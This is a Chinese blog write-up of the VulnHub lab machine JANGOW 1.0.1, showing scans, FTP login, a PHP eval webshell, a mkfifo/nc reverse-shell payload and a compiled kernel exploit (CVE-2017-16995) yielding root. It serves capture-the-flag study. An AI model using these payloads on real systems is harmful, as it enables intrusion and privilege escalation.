红队打靶练习:JANGOW: 1.0.1

最新推荐文章于 2024-07-31 22:43:52 发布
最新推荐文章于 2024-07-31 22:43:52 发布
阅读量423 收藏 7
点赞数 10
分类专栏: Vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/135187665
版权

目录

信息收集

1、arp探测

2、netdiscover

3、nmap扫描

4、目录扫描

WEB

1、80端口

2、21端口

ssh登录

1、写入shell

2、反弹shell

提权

Get shell

信息收集

1、arp探测
┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:e6:0b:60       VMware, Inc.
192.168.16.129  00:0c:29:66:12:08       VMware, Inc.
192.168.16.254  00:50:56:e6:5c:c0       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.361 seconds (108.43 hosts/sec). 4 responded
2、netdiscover
netdiscover工具

 Currently scanning: 172.26.56.0/16   |   Screen View: Unique Hosts                                                                    
                                                                                                                                       
 37 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 2220                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.16.1    00:50:56:c0:00:08     33    1980  VMware, Inc.                                                                        
 192.168.16.2    00:50:56:e6:0b:60      2     120  VMware, Inc.                                                                        
 192.168.16.129  00:0c:29:66:12:08      1      60  VMware, Inc.                                                                        
 192.168.16.254  00:50:56:e6:5c:c0      1      60  VMware, Inc.
3、nmap扫描
端口扫描
└─# nmap -p- 192.168.16.129                       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 12:25 CST
Nmap scan report for 192.168.16.129
Host is up (0.00022s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:66:12:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.69 seconds



┌──(root㉿ru)-[~/lianxi]
└─# cat xx.nmap   
# Nmap 7.94 scan initiated Thu Oct 12 12:29:48 2023 as: nmap -sS -sC -sV -A -T4 -p 21,80 -oA /root/lianxi/xx 192.168.16.129
Nmap scan report for 192.168.16.129
Host is up (0.00019s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:66:12:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.16.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 12 12:30:04 2023 -- 1 IP address (1 host up) scanned in 15.33 seconds
4、目录扫描
dirb

┌──(root㉿ru)-[~/lianxi]
└─# dirb http://192.168.16.129:80 -w php,txt,html,js,sh 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct 12 13:55:01 2023
URL_BASE: http://192.168.16.129:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.16.129:80/ ----
+ http://192.168.16.129:80/server-status (CODE:403|SIZE:279)                                                                           
==> DIRECTORY: http://192.168.16.129:80/site/                                                                                          
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/ ----
==> DIRECTORY: http://192.168.16.129:80/site/assets/                                                                                   
==> DIRECTORY: http://192.168.16.129:80/site/css/                                                                                      
+ http://192.168.16.129:80/site/index.html (CODE:200|SIZE:10190)                                                                       
==> DIRECTORY: http://192.168.16.129:80/site/js/                                                                                       
==> DIRECTORY: http://192.168.16.129:80/site/wordpress/                                                                                
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
+ http://192.168.16.129:80/site/assets/favicon.ico (CODE:200|SIZE:23462)                                                               
==> DIRECTORY: http://192.168.16.129:80/site/assets/img/                                                                               
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/wordpress/ ----
+ http://192.168.16.129:80/site/wordpress/index.html (CODE:200|SIZE:10190)                                                             
                                                                                                                                       
---- Entering directory: http://192.168.16.129:80/site/assets/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                       
-----------------
END_TIME: Thu Oct 12 14:00:43 2023
DOWNLOADED: 32284 - FOUND: 4


dirsearch

┌──(root㉿ru)-[~]
└─# dirsearch -u http://192.168.16.129:80 -e*           

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/.dirsearch/reports/192.168.16.129-80/_23-10-12_13-55-02.txt

Error Log: /root/.dirsearch/logs/errors-23-10-12_13-55-02.log

Target: http://192.168.16.129:80/

[13:55:02] Starting: 
[13:55:03] 200 -  336B  - /.backup                                         
[13:55:03] 403 -  279B  - /.ht_wsr.txt                                     
[13:55:03] 403 -  279B  - /.htaccess.bak1
[13:55:04] 403 -  279B  - /.htaccess.sample
[13:55:04] 403 -  279B  - /.htaccess_orig
[13:55:04] 403 -  279B  - /.htaccess_extra
[13:55:04] 403 -  279B  - /.htaccess.orig
[13:55:04] 403 -  279B  - /.htaccess_sc
[13:55:04] 403 -  279B  - /.htaccessOLD
[13:55:04] 403 -  279B  - /.htaccess.save
[13:55:04] 403 -  279B  - /.htaccessBAK
[13:55:04] 403 -  279B  - /.htaccessOLD2
[13:55:04] 403 -  279B  - /.htm                                            
[13:55:04] 403 -  279B  - /.html
[13:55:04] 403 -  279B  - /.httr-oauth
[13:55:04] 403 -  279B  - /.htpasswds                                      
[13:55:04] 403 -  279B  - /.htpasswd_test
[13:55:04] 403 -  279B  - /.php3                                           
[13:55:04] 403 -  279B  - /.php
[13:55:34] 403 -  279B  - /server-status                                    
[13:55:34] 403 -  279B  - /server-status/                                   
[13:55:36] 301 -  315B  - /site  ->  http://192.168.16.129/site/            
[13:55:36] 200 -   10KB - /site/                                            
                                                                            
Task Completed 

gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.16.129:80 -x php,txt,html,js,sh -w directory-list-lowercase-2.3-medium.txt 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.129:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,js,sh
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/site                 (Status: 301) [Size: 315] [--> http://192.168.16.129/site/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
==============================================================

feroxbuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# feroxbuster -u http://192.168.16.129:80 -x php,txt,html,js,sh -w directory-list-lowercase-2.3-medium.txt


 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.16.129:80
 🚀  Threads               │ 50
 📖  Wordlist              │ directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt, html, js, sh]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://192.168.16.129/site => http://192.168.16.129/site/
200      GET      106l      659w    26989c http://192.168.16.129/site/assets/img/demo-image-01.jpg
200      GET       54l      134w     1644c http://192.168.16.129/site/js/scripts.js
200      GET      492l     2733w   186437c http://192.168.16.129/site/assets/img/demo-image-02.jpg
200      GET        1l        0w        1c http://192.168.16.129/site/busque.php
200      GET      949l     4824w   385662c http://192.168.16.129/site/assets/img/bg-masthead.jpg
200      GET        8l       29w    28898c http://192.168.16.129/site/assets/favicon.ico
200      GET    11253l    21663w   207746c http://192.168.16.129/site/css/styles.css
200      GET      679l     4637w   425261c http://192.168.16.129/site/assets/img/ipad.png
200      GET      173l      663w    10190c http://192.168.16.129/site/index.html
200      GET     2608l    13994w   956051c http://192.168.16.129/site/assets/img/bg-signup.jpg
301      GET        9l       28w      322c http://192.168.16.129/site/assets => http://192.168.16.129/site/assets/
301      GET        9l       28w      319c http://192.168.16.129/site/css => http://192.168.16.129/site/css/
301      GET        9l       28w      325c http://192.168.16.129/site/wordpress => http://192.168.16.129/site/wordpress/
200      GET        1l        1w        2c http://192.168.16.129/site/123.php
200      GET      173l      663w    10190c http://192.168.16.129/site/wordpress/index.html
301      GET        9l       28w      318c http://192.168.16.129/site/js => http://192.168.16.129/site/js/
200      GET        1l       10w       87c http://192.168.16.129/site/wordpress/config.php
200      GET       44l      346w    26169c http://192.168.16.129/site/exp
[####################] - 5m   2491854/2491854 0s      found:19      errors:1      
[####################] - 0s   1245774/1245774 73280824/s http://192.168.16.129:80/ => Directory listing
[####################] - 5m   1245774/1245774 4008/s  http://192.168.16.129/site/ 
[####################] - 0s   1245774/1245774 4847370/s http://192.168.16.129/site/assets/ => Directory listing
[####################] - 0s   1245774/1245774 6591397/s http://192.168.16.129/site/js/ => Directory listing
[####################] - 1s   1245774/1245774 1338103/s http://192.168.16.129/site/assets/img/ => Directory listing
[####################] - 1s   1245774/1245774 1832021/s http://192.168.16.129/site/css/ => Directory listing
[####################] - 5m   1245774/1245774 3986/s  http://192.168.16.129/site/wordpress/

WEB

1、80端口

2、21端口
┌──(root㉿ru)-[~/lianxi]
└─# ftp                                                                                                      
ftp> open 192.168.16.129
Connected to 192.168.16.129.
220 (vsFTPd 3.0.3)
Name (192.168.16.129:root): jangow01
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||17403|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Oct 31  2021 .
drwxr-xr-x   14 0        0            4096 Jun 10  2021 ..
drwxr-xr-x    3 0        0            4096 Oct 31  2021 html
226 Directory send OK.
ftp> pwd
Remote directory: /var/www
ftp> cd home
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||27583|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Jun 10  2021 jangow01
ftp> cd jangow01
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||12012|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Jun 10  2021 .
drwxr-xr-x    3 0        0            4096 Oct 31  2021 ..
-rw-------    1 1000     1000          200 Oct 31  2021 .bash_history
-rw-r--r--    1 1000     1000          220 Jun 10  2021 .bash_logout
-rw-r--r--    1 1000     1000         3771 Jun 10  2021 .bashrc
drwx------    2 1000     1000         4096 Jun 10  2021 .cache
drwxrwxr-x    2 1000     1000         4096 Jun 10  2021 .nano
-rw-r--r--    1 1000     1000          655 Jun 10  2021 .profile
-rw-r--r--    1 1000     1000            0 Jun 10  2021 .sudo_as_admin_successful
-rw-rw-r--    1 1000     1000           33 Jun 10  2021 user.txt
226 Directory send OK.
ftp> cat user.txt
?Invalid command.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||33573|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*******************************************************************************************|    33        5.12 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (4.60 KiB/s)
ftp> 
zsh: suspended  ftp
                                                                                                                                        
┌──(root㉿ru)-[~/lianxi]
└─# ls
port.gnmap  port.nmap  port.xml  user.txt  xx.gnmap  xx.nmap  xx.xml
                                                                                                                                        
┌──(root㉿ru)-[~/lianxi]
└─# cat user.txt
d41d8cd98f00b204e9800998ecf8427e        第一个flag

ssh登录

1、写入shell
利用存在RCE页面进行反弹shell
echo '<?php echo "OK!";eval($_POST[cmd]); ?>' >shell.php

url编码
echo%20'%3C%3Fphp%20echo%20%22OK%EF%BC%81%22%3Beval(%24_POST%5Bcmd%5D)%3B%20%3F%3E'%20%3E987.php

连接蚁剑即可
2、反弹shell
在靶机目录(/etc/ssh/ssh_config)找到文件,文件开启了22端口,但是工具并没有扫到,说明可能被防火墙拦截了,做了限制,所以我们进行反弹shell要使用特制的shell脚本。

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   RhostsRSAAuthentication no
#   RSAAuthentication yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/identity
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Cipher 3des
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

使用 mkfifo 命令创建命名管道反弹shell

语法
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f

<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.129 443 >/tmp/f");?>


┌──(root㉿ru)-[~/lianxi]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.16.129: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.129] 37342
/bin/sh: 0: can't access tty; job control turned off
$ whereis python
python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ pwd
pwd
/var/www/html/site
www-data@jangow01:/var/www/html/site$ uname -a
uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/var/www/html/site$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial
www-data@jangow01:/var/www/html/site$

提权

┌──(root㉿ru)-[~/lianxi]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.16.129: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.129] 37342
/bin/sh: 0: can't access tty; job control turned off
$ whereis python
python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ pwd
pwd
/var/www/html/site
www-data@jangow01:/var/www/html/site$ uname -a
uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/var/www/html/site$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial
www-data@jangow01:/var/www/html/site$ 

┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 4.4.0-31
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                  | linux/dos/43234.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Esca | windows_x86-64/local/47170.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                         | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escal | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                | linux/local/41760.txt
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                        
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 16.04.1              
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation              | linux/local/40489.txt
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                      
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 16.04   
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                    | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                       | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem'  | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                           | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack C | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                               | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read           | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                     | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                  | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation    | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escala | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Es | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation        | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation              | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                                          | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                       | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                              | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation   | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SME | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Esc | linux/local/47169.c
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                      
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 45010.c  
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /root/lianxi/45010.c

然后把poc扔进蚁剑,随后进行下一步操作

www-data@jangow01:/var/www/html/site$ ls
ls
45010.c  assets      css          index.html  wordpress
987.php  busque.php  ffshell.php  js
www-data@jangow01:/var/www/html/site$ gcc 45010.c -o exp   //编译
gcc 45010.c -o exp
www-data@jangow01:/var/www/html/site$ ls
ls
45010.c  assets      css  ffshell.php  js
987.php  busque.php  exp  index.html   wordpress
www-data@jangow01:/var/www/html/site$ chmod +x exp   赋权
chmod +x exp
www-data@jangow01:/var/www/html/site$ ./exp
./exp
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003a782d00
[*] Leaking sock struct from ffff880039ff7680
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039444900
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880039444900
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Get shell

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# pwd
pwd
/var/www/html/site
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&                          
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@                          
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@                          
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*   ./@@*   &@@                          
                       @  @@@@@* (@@@@@@@@@#/.               .*@.  .#&.   &@@@&&                    
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&                    
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&                    
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@                   
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @                   
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@                  
                      @@/  *@@@@@@@/           @@@@@@@@@@@#                      @@                 
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@                 
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@                 
                       @&   .@@@@@@@@.         , @@@@@@@ *            .@@@*(    .@                  
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@                  
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@                   
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@                    
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&                    
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&                    
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&                    
                       @  @@@@@@@@&               JANGOW               &@@@                          
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&                          
                                     &&&@@@@&%       &/    (&&@@@&&&                                
                                       (((((((((((((((((((((((((((((





da39a3ee5e6b4b0d3255bfef95601890afd80709  第二个flag
真的学不了一点。。。
关注
专栏目录
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2762
迟到的文章,就当库存发出来吧~
红队武器库:fastjson小于1.2.68全漏洞RCE利用exp复现
热门推荐
god_Zeo的安全博客
07-04 5万+
0x01漏洞介绍 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 0x02影响范围 Fastjson < 1.2.68 Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有 0x03漏洞复现 下面以Fastjson 1.2.47 为例子,因为vulhub有现成的环境十分方便
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3282
一次打靶记录。
【Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 829
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4364
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 2026
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
Windows红队持久性:注册表运行键技术解析
"这篇文档详细介绍了在Windows环境中如何利用注册表运行键来实现权限的持久化,这是红队渗透测试中常见的技术手段。文档强调了持久性在红队行动中的重要性,允许攻击者在不失去与C&C(指挥与控制)服务器连接的情况...
红队笔记:技巧,窍门和技巧的串联
02-25
红队笔记 提示,技巧和技巧的串联。 当前主题:文件传输
红队技巧:隐藏windows服务1
08-03
